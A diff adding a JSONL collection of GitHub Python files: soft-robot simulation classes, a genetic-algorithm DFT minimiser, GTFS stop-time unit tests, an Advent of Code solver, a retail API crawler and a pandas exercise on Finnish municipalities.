diff --git "a/138.jsonl" "b/138.jsonl" new file mode 100644--- /dev/null +++ "b/138.jsonl" @@ -0,0 +1,572 @@ +{"seq_id":"8035235604","text":"## Classes used by functions\n\n# Imports\nimport time\n\nfrom evolve_soft_2d import utility\nfrom evolve_soft_2d.unit import inspect, rep_grid\nfrom evolve_soft_2d.file_paths import create_fp_file\n\n################################################################################\n\nclass ogd_mat:\n \"\"\"Ogden material model\n \"\"\"\n\n def __init__(\n self,\n name: str,\n mu: list,\n alpha: list,\n ) -> None:\n \"\"\"Material parameters\n\n Parameters\n ----------\n name : str\n The name of the material\n mu : list\n The mu parameters\n alpha : list\n The exponent parameters\n \"\"\"\n\n self.name = name\n self.mu = mu\n self.alpha = alpha\n\n def __repr__(self) -> str:\n \"\"\"Format a representation of the material model\n\n Returns\n -------\n str\n Formatted representation of the Ogden material class for the log\n \"\"\"\n\n r = \"Name: {}\\n\".format(self.name)\n r += \"Mu: {}\\n\".format(self.mu)\n r += \"Alpha: {}\".format(self.alpha)\n return r\n\n################################################################################\n\nclass template:\n \"\"\"Unit template parameters\n \"\"\" \n \n def __init__(\n self, \n case: int,\n x_e: int,\n y_e: int,\n e_s: float,\n b: int,\n ogd_mat: ogd_mat,\n n_steps: int,\n tab_nam: str,\n d_mag: float,\n p_mag: float,\n run_success: bool = False,\n c_e: list = [0, 0, 0],\n i_e: list = [0, 0, 0],\n ) -> None:\n \"\"\"[summary]\n\n Parameters\n ----------\n case : int\n The unit template case identifier\n x_e : int\n The number of elements in the x-direction\n y_e : int\n The number of elements in the y-direction\n e_s : float\n The element size in mm\n b : int\n The number of elements in the boundary of the unit\n ogd_mat : ogd_mat\n The Ogden material model\n n_steps : int\n The number of steps in the second of the simulation\n tab_nam : str\n The name of the table containing the function of the load to be applied\n d_mag : float\n The magnitude of the applied displacement in mm\n p_mag : float\n The magnitude of the applied internal pressure in MPa\n run_success : bool, optional\n The success of the unit template's run, by default False\n c_e : list, optional\n The constraint energy of the unit template, by default [0, 0, 0]\n i_e : list, optional\n The internal energy of the unit template, by default [0, 0, 0]\n \"\"\"\n\n self.case = case\n\n if x_e % 2 == 0:\n self.x_e = x_e + 1\n else:\n self.x_e = x_e\n\n if y_e % 2 == 0:\n self.y_e = y_e + 1\n else:\n self.y_e = y_e \n\n self.e_s = e_s\n self.b = b\n self.ogd_mat = ogd_mat\n self.n_steps = n_steps\n self.tab_nam = tab_nam\n self.d_mag = d_mag\n self.p_mag = p_mag\n self.run_success = run_success\n self.c_e = c_e\n self.i_e = i_e\n\n self.x_s = self.e_s*self.x_e\n self.y_s = self.e_s*self.x_e\n\n # The number of nodes in the x-direction\n self.x_n = self.x_e + 1\n # The number of nodes in the y-direction\n self.y_n = self.y_e + 1\n # The total number of elements\n self.n_e = self.x_e * self.y_e\n # The total number of nodes\n self.n_n = self.x_n * self.y_n\n # The list of internal elements\n self.e_internal = inspect.find_e_internal(self.x_e, self.y_e, self.b)\n # The list of external nodes\n self.n_external = inspect.find_n_external(self.x_n, self.y_n)\n\n # The total number of elements as a string label\n self.n_e_l = utility.list_to_str([self.x_e, self.y_e], \"x\")\n # The size of the grid as a string label\n self.s_l = utility.list_to_str([self.x_s, self.y_s], \"x\")\n\n # The template ID\n self.t_id = str(self.case) + \"_\" + self.n_e_l + \"_\" + self.s_l + \"_\" + str(self.b)\n\n # The representative grid of ones\n self.grid = rep_grid.create_grid(self.x_e, self.y_e, 1)\n\n # The file path of the template file\n self.fp_t_mud = create_fp_file(self, \".mud\", \"t\")\n # The file path of the template file log\n self.fp_t_log = create_fp_file(self, \"_job_1.log\", \"t\")\n # The file path of the unit t16 file\n self.fp_t_t16 = create_fp_file(self, \"_job_1.t16\", \"t\")\n # The file path of the template file log\n self.fp_t_l = create_fp_file(self, \".log\", \"t\")\n\n def __repr__(self) -> str:\n \"\"\"Format a representation of the template for the log\n\n Returns\n -------\n str\n Formatted representation of the template class for the log\n \"\"\"\n\n r = \"Case: {}\\nParameters:\\n\".format(self.case)\n r += \"Dimensions: {} elements\\n\".format(self.n_e_l)\n r += \"Size: {} mm\\n\".format(self.s_l)\n r += \"Boundary thickness: {} elements\\n\".format(self.b)\n r += \"Internal element IDs: {}\\n\".format(self.e_internal)\n r += \"Applied displacement: {} mm\\n\".format(self.d_mag)\n r += \"Applied pressure: {} MPa\\n\".format(self.p_mag)\n r += \"Analysis steps: {}\\n\".format(self.n_steps)\n r += \"Run successful: {}\\n\".format(self.run_success)\n r += \"Constraint energy:\\nX : {} J\\nY : {} J\\nMagnitude: {} J\\n\".format(self.c_e[0], self.c_e[1], self.c_e[2])\n r += \"Internal energy:\\nX : {} J\\nY : {} J\\nMagnitude: {} J\\n\".format(self.i_e[0], self.i_e[1], self.i_e[2])\n r += \"\\nOgden material parameters:\\n{}\\n\".format(self.ogd_mat)\n r += \"\\nTime created: {}\".format(time.ctime())\n return r\n\n################################################################################\n\nclass unit_p:\n \"\"\"Unit parameters\n \"\"\" \n\n def __init__(\n self,\n template: template,\n rem: list,\n grid: list,\n ls = None,\n cp = None,\n run_success: bool = False,\n c_e: list = [0, 0, 0],\n i_e: list = [0, 0, 0],\n d: list = [],\n ) -> None:\n \"\"\"The unit parameters\n\n Parameters\n ----------\n template : template\n The unit template parameters\n rem : list\n The list of elements removed from the unit\n grid : list\n The representative grid with the elements removed\n ls : lsystem, optional\n The L-System, by default None\n cp : cppn_i, optional\n The CPPN model, by default None\n run_success : bool, optional\n The success of the unit's run, by default False\n c_e : list, optional\n The constraint energy of the unit template, by default [0, 0, 0]\n i_e : list, optional\n The internal energy of the unit template, by default [0, 0, 0]\n d : list, optional\n [description], by default []\n \"\"\"\n\n self.template = template\n self.rem = rem\n self.grid = grid\n self.ls = ls\n self.cp = cp\n self.run_success = run_success\n self.c_e = c_e\n self.i_e = i_e\n self.d = d\n\n # The list of elements removed from the unit as a string\n self.rem_l = utility.list_to_str(rem, \"_\")\n\n # Generate the unique unit ID according to the method of unit generation\n if self.ls != None:\n\n self.u_id = str(len(self.rem)) + \"_\" + utility.gen_hash(utility.list_to_str(self.ls.gramm, \"_\"))\n\n elif self.cp != None:\n\n self.u_id = str(len(self.rem)) + \"_\" + str(self.cp.mod_id) + \"_\" + str(self.cp.cppn.seed) + \"_\" + str(self.cp.cppn.scale) + \"_\" + str(self.cp.cppn.hl_n) + \"_\" + str(self.cp.cppn.hl_s) + \"_\" + str(self.cp.cppn.thresh)\n\n else:\n \n self.u_id = str(len(self.rem)) + \"_\" + utility.gen_hash(self.rem_l)\n\n # The representative grid with the elements removed as a string label\n self.grid_l = self.format_grid()\n\n # The file path of the unit file\n self.fp_u_mud = create_fp_file(self.template, \".mud\", \"u\", self)\n # The file path of the unit log file\n self.fp_u_log = self.create_fp_list(\"log\")\n # The file path of the unit t16 file\n self.fp_u_t16 = self.create_fp_list(\"t16\")\n # The file path of the unit file log\n self.fp_u_l = create_fp_file(self.template, \".log\", \"u\", self)\n \n def __repr__(self) -> str:\n \"\"\"Format a representation of the unit\n\n Returns\n -------\n str\n Formatted representation of the unit class for the log\n \"\"\" \n r = \"Unit: {}\\n\".format(self.u_id)\n r += \"Removed elements: {}\\n\".format(self.rem)\n\n if self.ls != None:\n\n r += \"{}\\n\".format(self.ls)\n\n elif self.cp != None:\n\n r += \"{}\\n\".format(self.cp)\n\n r += \"Representative grid:\\n{}\\n\".format(self.grid_l)\n r += \"Run successful: {}\\n\".format(self.run_success)\n r += \"Constraint energy:\\nX : {} J\\nY : {} J\\nMagnitude: {} J\\n\".format(self.c_e[0], self.c_e[1], self.c_e[2])\n r += \"Internal energy:\\nX : {} J\\nY : {} J\\nMagnitude: {} J\\n\".format(self.i_e[0], self.i_e[1], self.i_e[2])\n r += \"\\nTemplate details:\\n{}\".format(self.template)\n return r\n\n def format_grid(self) -> str:\n \"\"\"Function to format the representative grid for the log\n\n Returns\n -------\n str\n The representative grid of the unit as a string\n \"\"\"\n \n grid_l = rep_grid.create_grid(self.template.x_e, self.template.y_e, 1)\n\n for i in range(0, len(self.grid)):\n grid_l[i] = \" \".join(map(str, self.grid[i]))\n \n grid_l = \"\\n\".join(map(str, grid_l))\n \n return grid_l\n\n def create_fp_list(\n self,\n ext: str,\n ) -> list:\n \"\"\"Create a list of unit file paths\n\n Parameters\n ----------\n ext : str\n The extension to add to the file path\n\n Returns\n -------\n list\n The list of file paths\n \"\"\" \n\n fp_list = []\n\n for i in range(1, 4):\n\n fp_list.append(create_fp_file(self.template, \"_job_{}.{}\".format(i, ext), \"u\", self))\n\n return fp_list\n\n################################################################################\n\n# Example material models\n\nmold_star_15 = ogd_mat(\"Mold Star 15\", [-6.50266e-06, 0.216863, 0.00137158], [-21.322, 1.1797, 4.88396])\n\necoflex_0030 = ogd_mat(\"Ecoflex 0030\", [-0.0142909, -3.64558e-06, 9.59447e-08], [-5.22444, -0.162804, 11.3772])\n\nsmooth_sil_950 = ogd_mat(\"Smooth Sil 950\", [-0.30622, 0.0283304, 6.5963e-09], [-3.0594, 4.59654, 17.6852])","repo_name":"NaudeConradie/evolve_soft_2d","sub_path":"evolve_soft_2d/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":11137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31839723562","text":"import sqlalchemy as sa\n\nfrom utils.request_schema import CitizenImport\nfrom db.models import relative_table\n\n\ndef citizen_record_obj_to_dict(conn, import_id, citizen_rec):\n d = dict(citizen_rec)\n d['gender'] = d['gender'].value\n d['birth_date'] = d['birth_date'].strftime('%d.%m.%Y')\n d['relatives'] = get_relatives_list(conn, import_id, citizen_rec.citizen_id)\n del d['id']\n del d['import_id']\n return d\n\n\ndef get_relatives_list(conn, import_id, citizen_id):\n s = sa.select(\n [relative_table.c.citizen_id, relative_table.c.relative_id]\n ).where(\n sa.and_(\n relative_table.c.import_id == import_id,\n sa.or_(\n relative_table.c.citizen_id == citizen_id,\n relative_table.c.relative_id == citizen_id\n )\n )\n )\n rows = conn.execute(s)\n results = []\n for r in rows:\n if r.citizen_id != citizen_id:\n results.append(r.citizen_id)\n else:\n results.append(r.relative_id)\n return results\n","repo_name":"kholmatov/citizens","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31222559551","text":"'''\nBirmingham Parallel Genetic Algorithm\n\nA pool genetic algorithm for the\nstructural characterisation of \nnanoalloys.\n\nPlease cite - \nA. Shayeghi et al, PCCP, 2015, 17, 2104-2112\n\nAuthors -\nThe Johnston Group\n\n20/3/15\n\n--- Random Structure Minimiser Class ---\n\n'''\n\nimport sys, os\nimport random as ran\nimport Database as db\n\nfrom fixOverlap import fixOverlap\nfrom DFT_input import vasp_input as DFTin\nfrom DFT_output import vasp_output as DFTout\nfrom checkPool import checkPool as checkPool\nfrom CoM import CoM \nfrom Explode import checkClus\n\nfrom SurfOpt import SurfOpt \nfrom surfacePOSCAR import surfacePOSCAR \n\nclass minRan:\n\n\tdef __init__(self\n\t\t\t\t,natoms,r_ij\n\t\t\t\t,eleNums,eleNames\n\t\t\t\t,eleMasses,nPool\n\t\t\t\t,stride,subString\n\t\t\t\t,boxAdd,surface\n\t\t\t\t,surfGA):\n\n\t\tself.natoms = natoms\n\t\tself.r_ij = r_ij\n\t\tself.eleNums = eleNums\n\t\tself.eleNames = eleNames\n\t\tself.eleMasses = eleMasses\n\t\tself.nPool = nPool\n\t\tself.stride = stride\n\t\tself.subString = subString\n\t\tself.boxAdd = boxAdd\n\n\t\t'''\n\t\tSurface Object.\n\t\t'''\n\n\t\tself.surface = surface\n\t\tself.surfGA = surfGA\n\n\t\tdb.lock()\n\n\t\tself.calcNum = db.findLastDir() + 1 \n\t\tos.system(\"mkdir \" + str(self.calcNum))\n\n\t\tdb.unlock()\n\n\t\tself.genRan()\n\n\tdef genRan(self): \n\n\t\tclus = []\n\t\tscale=self.natoms**(1./3.)\n\n\t\tfor i in range(len(self.eleNames)):\n\t\t\tfor j in range(self.eleNums[i]):\n\n\t\t\t\tele = self.eleNames[i]\n\n\t\t\t\tx = ran.uniform(0,1)*self.r_ij*scale\n\t\t\t\ty = ran.uniform(0,1)*self.r_ij*scale\n\t\t\t\tz = ran.uniform(0,1)*self.r_ij*scale\n\n\t\t\t\tatom = [ele,x,y,z]\n\n\t\t\t\tclus.append(atom)\n\n\t\tclus = fixOverlap(clus)\n\n\t\tif self.surfGA:\n\n\t\t\t'''\n\t\t\tWrite Surface POSCAR.\n\t\t\t'''\n\n\t\t\tSurfaceStruc = SurfOpt(clus,self.surface,self.eleNames,self.eleMasses)\n\t\t\tsurfClus = SurfaceStruc.placeClus()\n\n\t\t\tself.vaspIN = surfacePOSCAR(self.calcNum,self.eleNames,surfClus,self.surface)\n\n\t\telse: \n\n\t\t\t'''\n\t\t\tWrite gas-phase POSCAR.\n\t\t\t'''\n\t\n\t\t\tself.vaspIN = DFTin(self.calcNum,clus,self.eleNames\n\t\t\t\t\t\t\t\t,self.eleMasses,self.eleNums\n\t\t\t\t\t\t\t\t,self.boxAdd)\n\n\n\t\tself.minimise()\n\n\n\tdef minimise(self):\n\n\t\t'''\n\t\tStart \n\t\tDFT calculation.\n\t\t'''\n\n\t\tif self.doDFT() == 0:\n\n\t\t\toutput = DFTout(self.calcNum,self.natoms)\n\n\t\t\tif output.checkError():\n\t\t\t\tself.genRan()\n\t\t\telse:\n\t\t\t\tself.finalEnergy = output.getEnergy()\n\t\t\t\tself.finalCoords = output.getCoords()\n\n\t\t\t\tcheck = checkClus(self.natoms,self.finalCoords)\n\n\t\t\t\tif check.exploded() == False:\n\t\t\t\t\tself.decide()\n\t\t\t\telse:\n\t\t\t\t\tself.genRan()\n\n\t\telse:\n\n\t\t\tself.genRan()\n\n\tdef doDFT(self):\n\n\t\t'''\n\t\tChange directory and \n\t\tsubmit calculation.\n\t\t'''\n\n\t\tbase = os.environ[\"PWD\"]\n\t\tos.chdir(base+\"/\"+str(self.calcNum))\n\n\t\texitcode = os.system(self.subString)\n\n\t\twith open(base+\"/exitcodes.dat\",\"a\") as exit:\n\t\t\texit.write(str(self.calcNum))\n\t\t\texit.write(\" Exitcode = \"+str(exitcode)+\"\\n\")\n\t\t\t\n\t\tos.chdir(base)\n\n\t\treturn exitcode\n\n\tdef decide(self):\n\n\t\t'''\n\t\tShould cluster be added to pool.dat?\n\t\t'''\n\n\t\tif os.path.exists(\"pool.dat\"):\n\t\t\twith open(\"pool.dat\",\"r\") as pool:\n\t\t\t\tpoolList = pool.readlines()\n\t\t\t\tpoolSize = len(poolList) / (self.natoms + 2)\n\t\t\t\tif poolSize < self.nPool:\n\t\t\t\t\tself.addToPool()\n\t\t\t\telse:\n\t\t\t\t\tAcceptReject = checkPool()\n\t\t\t\t\tAccept = AcceptReject.checkEnergy(float(self.finalEnergy))\n\n\t\t\t\t\tif Accept:\n\t\t\t\t\t\tIndex = AcceptReject.lowestIndex\n\t\t\t\t\t\tIndex = (Index*self.stride)+1\n\n\t\t\t\t\t\tdb.updatePool(\"Finish\"\n\t\t\t\t\t\t\t\t\t,Index,self.eleNums\n\t\t\t\t\t\t\t\t\t,self.eleNames,self.eleMasses\n\t\t\t\t\t\t\t\t\t,self.finalEnergy,self.finalCoords\n\t\t\t\t\t\t\t\t\t,self.stride,self.vaspIN.box)\n\t\telse:\n\t\t\tself.addToPool()\n\n\n\tdef addToPool(self):\n\n\t\t'''\n\t\tAdd Final Geometry and \n\t\tenergy to pool.dat.\n\t\t'''\n\n\t\tclus = []\n\n\t\toutput = DFTout(self.calcNum,self.natoms)\n\t\tself.finalEnergy = output.getEnergy()\n\t\tself.finalCoords = output.getCoords()\n\n\t\tdb.lock()\n\n\t\twith open(\"pool.dat\",\"a\") as pool:\n\n\t\t\tpool.write(str(self.natoms)+\"\\n\")\n\t\t\tpool.write(\"Energy = \"+str(self.finalEnergy))\n\t\t\tpool.write(\" Dir = \"+str(self.calcNum)+\"\\n\")\n\n\t\t\t'''\n\t\t\tMove coordinates from \n\t\t\tcentre of the simulation cell.\n\t\t\t'''\n\n\t\t\tbox = self.vaspIN.box\n\t\t\tself.finalCoords = [float(i) - box/2 for i in self.finalCoords]\n\n\t\t\t'''\n\t\t\tChange format of \n\t\t\tthe coordinates.\n\t\t\t'''\n\n\t\t\tfor i in range(0,self.natoms*3,3):\n\n\t\t\t\tx = self.finalCoords[i]\n\t\t\t\ty = self.finalCoords[i+1]\n\t\t\t\tz = self.finalCoords[i+2]\n\n\t\t\t\tclus.append([x,y,z])\n\n\t\t\t'''\n\t\t\tAdd the element types\n\t\t\tand write to pool file.\n\t\t\t'''\n\n\t\t\tcount = 0\n\n\t\t\tfor i in range(len(self.eleNames)):\n\t\t\t\tfor j in range(self.eleNums[i]):\n\t\t\t\t\tele = self.eleNames[i]\n\t\t\t\t\tx,y,z = clus[count]\n\t\t\t\t\tatom = ele+\" \"+str(x)+\" \"+str(y)+\" \"+str(z)+\"\\n\"\n\t\t\t\t\tpool.write(atom)\n\t\t\t\t\tcount += 1\n\n\t\tdb.unlock()\n\n","repo_name":"jbadavis/bpga","sub_path":"GA/MinimiseRan.py","file_name":"MinimiseRan.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"2760691673","text":"from shape import Shape\n\nclass Triangle (Shape):\n tcounter = 0\n def __init__(self , c1 , c2 , c3 , color):\n self.c1 = c1\n self.c2 = c2\n self.c3 = c3\n Triangle.tcounter += 1\n super().__init__(\"triangle \" + str(Triangle.tcounter) , color , 3 )\n\n","repo_name":"mahtabfarrokh/python-course-summer-2017","sub_path":"third/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21446039612","text":"import enum\n\nINVALID_TYPE_EXCEPTION = \"Invalid data type given\"\nINVALID_CHAR_EXCEPTION = \"Invalid character given\"\n\nBASEMENT_NOT_FOUND = -1\n\n\n# Expected Character enum\nclass Directions(enum.Enum):\n UP = \"(\"\n DOWN = \")\"\n\n\nclass AoC2015Day1Exception(Exception):\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\n\nclass Day1:\n def __init__(self):\n self._floor = 0\n self._basement_interation_index = BASEMENT_NOT_FOUND\n\n def reset(self):\n self._floor = 0\n self._basement_interation_index = BASEMENT_NOT_FOUND\n\n def calc_floor(self, input_string):\n # Checking for invalid input types\n if type(input_string) != str:\n raise AoC2015Day1Exception(\"%s: %s\" % (INVALID_TYPE_EXCEPTION, type(input_string)))\n\n loop_count = 0\n\n for character in input_string:\n if character != Directions.UP.value and character != Directions.DOWN.value:\n raise AoC2015Day1Exception(\"%s: %s\" % (INVALID_CHAR_EXCEPTION, character))\n\n if character == Directions.UP.value:\n self._floor += 1\n elif character == Directions.DOWN.value:\n self._floor -= 1\n\n # Setting basement interation only if it not already found\n if self._floor < 0 and self._basement_interation_index == BASEMENT_NOT_FOUND:\n self._basement_interation_index = loop_count\n\n loop_count += 1\n\n def get_floor(self):\n return self._floor\n\n def get_basement_interation(self):\n # Adjusting for indexing to be 1 indexed instead of 0 indexed\n return self._basement_interation_index + 1\n\n\nif __name__ == \"__main__\":\n\n day1_file_path = \"../../test/input_data/2015/day1_input.txt\"\n\n with open(day1_file_path, \"r\") as input_file:\n input_data = input_file.read()\n\n day1 = Day1()\n\n day1.calc_floor(input_data)\n\n print(\"--- Day 1: Not Quite Lisp ---\")\n print(\"Part A Final floor: %d\" % day1.get_floor())\n print(\"Part B Iterations until basement entered: %d\" % day1.get_basement_interation())\n","repo_name":"ConanSherlock/CodingExercises","sub_path":"python/2015/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"202493685","text":"\"\"\"\ntest_stop_time.py: tests for realtime_gtfs/stop_time.py\n\"\"\"\n\nimport pytest\n\nfrom realtime_gtfs.models import StopTime\nfrom realtime_gtfs.exceptions import MissingKeyError, InvalidKeyError, InvalidValueError\n\nMINIMAL_STOP_TIME_DICT = {\n \"trip_id\": \"123\",\n \"arrival_time\": \"01:23:45\",\n \"stop_id\": \"123\",\n \"stop_sequence\": \"5\"\n}\n\nFULL_STOP_TIME_DICT = {\n \"trip_id\": \"123\",\n \"arrival_time\": \"1:23:45\",\n \"departure_time\": \"25:23:45\",\n \"stop_id\": \"123\",\n \"stop_sequence\": \"5\",\n \"stop_headsign\": \"I'm a sign\",\n \"pickup_type\": \"3\",\n \"drop_off_type\": \"2\",\n \"shape_dist_traveled\": \"5.25\",\n \"timepoint\": \"0\"\n}\n\nMINIMAL_STOP_TIME = StopTime.from_dict(MINIMAL_STOP_TIME_DICT)\nFULL_STOP_TIME = StopTime.from_dict(FULL_STOP_TIME_DICT)\n\ndef test_stop_time_happyflow_minimal():\n \"\"\"\n test_stop_time_happyflow_minimal: minimal, correct example\n \"\"\"\n stop_time = StopTime.from_gtfs(MINIMAL_STOP_TIME_DICT.keys(), MINIMAL_STOP_TIME_DICT.values())\n assert stop_time == MINIMAL_STOP_TIME\n\ndef test_stop_time_happyflow_full():\n \"\"\"\n test_stop_time_happyflow_full: full, correct example\n \"\"\"\n stop_time = StopTime.from_gtfs(FULL_STOP_TIME_DICT.keys(), FULL_STOP_TIME_DICT.values())\n assert stop_time == FULL_STOP_TIME\n\ndef test_missing_key():\n \"\"\"\n test_missing_key: check if it errors if a required key is missing\n \"\"\"\n temp_dict = FULL_STOP_TIME_DICT.copy()\n del temp_dict[\"trip_id\"]\n with pytest.raises(MissingKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = FULL_STOP_TIME_DICT.copy()\n del temp_dict[\"departure_time\"]\n del temp_dict[\"arrival_time\"]\n with pytest.raises(MissingKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = FULL_STOP_TIME_DICT.copy()\n del temp_dict[\"stop_id\"]\n with pytest.raises(MissingKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = FULL_STOP_TIME_DICT.copy()\n del temp_dict[\"stop_sequence\"]\n with pytest.raises(MissingKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n\ndef test_invalid_values():\n \"\"\"\n test_invalid_values: test for values out of range, invalid enums, ...\n \"\"\"\n # TODO: test times\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"stop_sequence\"] = \"-1\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"pickup_type\"] = \"-1\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"pickup_type\"] = \"4\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"drop_off_type\"] = \"-1\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"drop_off_type\"] = \"4\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"shape_dist_traveled\"] = \"-1\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"timepoint\"] = \"-1\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"timepoint\"] = \"2\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n\ndef test_default():\n \"\"\"\n test_default: check for correct default values (wheelchair_boarding and location_type)\n \"\"\"\n assert MINIMAL_STOP_TIME.pickup_type == 0\n assert MINIMAL_STOP_TIME.drop_off_type == 0\n assert MINIMAL_STOP_TIME.timepoint == 1\n\ndef test_invalid_key():\n \"\"\"\n test_invalid_key: test if it errors if an invalid key is passed\n \"\"\"\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"stop_time_favorite_food\"] = \"Pizza\"\n with pytest.raises(InvalidKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\ndef test_representation():\n \"\"\"\n test_representation: check if __str__ and __repr__ are defined\n \"\"\"\n assert str(MINIMAL_STOP_TIME) != \"\"\n assert repr(MINIMAL_STOP_TIME) != \"\"\n\ndef test_empty_value():\n \"\"\"\n test_empty_value: test if it doesn't overwrite values with empty string\n \"\"\"\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"stop_id\"] = \"\"\n with pytest.raises(MissingKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n# pylint: disable=comparison-with-itself\ndef test_equal():\n \"\"\"\n test_equal: check if __eq__ functions\n \"\"\"\n assert MINIMAL_STOP_TIME == MINIMAL_STOP_TIME\n assert MINIMAL_STOP_TIME != FULL_STOP_TIME\n assert FULL_STOP_TIME != MINIMAL_STOP_TIME\n assert FULL_STOP_TIME == FULL_STOP_TIME\n assert MINIMAL_STOP_TIME != \"MINIMAL_STOP_TIME\"\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"drop_off_type\"] = \"1\"\n temp_stop_time = StopTime.from_dict(temp_dict)\n\n assert temp_stop_time != MINIMAL_STOP_TIME\n","repo_name":"Robbe7730/realtime-gtfs","sub_path":"tests/test_stop_time.py","file_name":"test_stop_time.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73529601427","text":"import http.client, urllib.request, urllib.parse, urllib.error, base64\nimport json\nimport pandas as pd\nimport os\n\ndata_path = \"YOUR_PATH\"\ndata = pd.read_csv(os.path.join(data_path+ \"Junction_data_sample.csv\"), sep=\";\")\n\n# because of a (suspected) API bug, the info of all products is not fetchable.\n# Querying for specific values seems to check for the urlSlug,\n# because of this we fetch info on any product which has its ean in the urlSlug as a hack-around the 100 limit.\n# This leads to a drastic reduction in data we can obtain, but is good enough for now.\n\nunique_ena = data.EAN.unique()\n\nheaders = {\n # Request headers\n 'Content-Type': 'application/json',\n 'Ocp-Apim-Subscription-Key': 'YOUR_KEY',\n}\n\nparams = urllib.parse.urlencode({\n\n})\nall_eans = []\nfor ean in unique_ena:\n\n body = {\"query\": \"%s\"%ean}\n\n # body = {\"filters\": {\n # \"ean\": unique_ena\n # }}\n json_data = json.dumps(body)\n\n try:\n conn = http.client.HTTPSConnection('kesko.azure-api.net')\n conn.request(\"POST\", \"/v1/search/products?%s\" % params, \"%s\" % json_data, headers)\n response = conn.getresponse()\n data = response.read()\n print(data)\n conn.close()\n\n df = pd.read_json(data)\n results = df.results.to_json()\n test = pd.read_json(results).T\n\n print(test.head())\n print(len(test))\n all_eans.append(test)\n\n except Exception as e:\n print(\"[Errno {0}] {1}\".format(e.errno, e.strerror))\n\nbig_df = pd.concat(all_eans)\nbig_df.to_csv(data_path+\"product_info.csv\", index=False)\nprint(len(big_df))\n\nprint(\"Done\")\n","repo_name":"clara2911/junction2019_sustainability","sub_path":"apis/search_api/product_search_data_crawler.py","file_name":"product_search_data_crawler.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23707105666","text":"import pandas as pd\n\ndf = pd.read_csv('https://student.labranet.jamk.fi/~varpe/datananal2k2020/kerta3/kunnat.txt', sep = ';', decimal=',')\n\nprint(\"a) Seutukuntien pinta-alat:\")\ndf1 = pd.DataFrame(df['maapinta-ala'].groupby(df['seutukunta']).sum())\nprint(df1.sort_values('maapinta-ala', ascending=False).head(5))\n\nprint(\"b) maakuntien kaupungistuminen:\")\ndf['kaupunkilaiset'] = 0\ndf.loc[(df['kuntamuoto'] == \"Kaupunki\"), 'kaupunkilaiset'] = df['Väkiluku']\n\nkaupunkilaiset = pd.DataFrame((df['kaupunkilaiset'].groupby(df['maakunta']).sum()) / (df['Väkiluku'].groupby(df['maakunta']).sum()) * 100)\nkaupunkilaiset['kaupungistuminen%'] = kaupunkilaiset.iloc[:, 0]\nprint(kaupunkilaiset.sort_values(['kaupungistuminen%'], ascending=False).head(5))\n\nprint(\"c) Ruotsinkielisten osuus maakunnittain\")\ndf['ruottalaiset'] = df['Ruotsinkielisten osuus%'] * df['Väkiluku'] / 100\nruottalaiset = pd.DataFrame((df['ruottalaiset'].groupby(df['maakunta']).sum()) / (df['Väkiluku'].groupby(df['maakunta']).sum()) * 100) \nruottalaiset['ruottalaiset%'] = ruottalaiset.iloc[:, 0]\nprint(ruottalaiset.sort_values('ruottalaiset%', ascending=False).head(5))","repo_name":"TapaniAlastalo/data_analytics","sub_path":"data_analytiikka/tehtävät/t3/t3t1.py","file_name":"t3t1.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 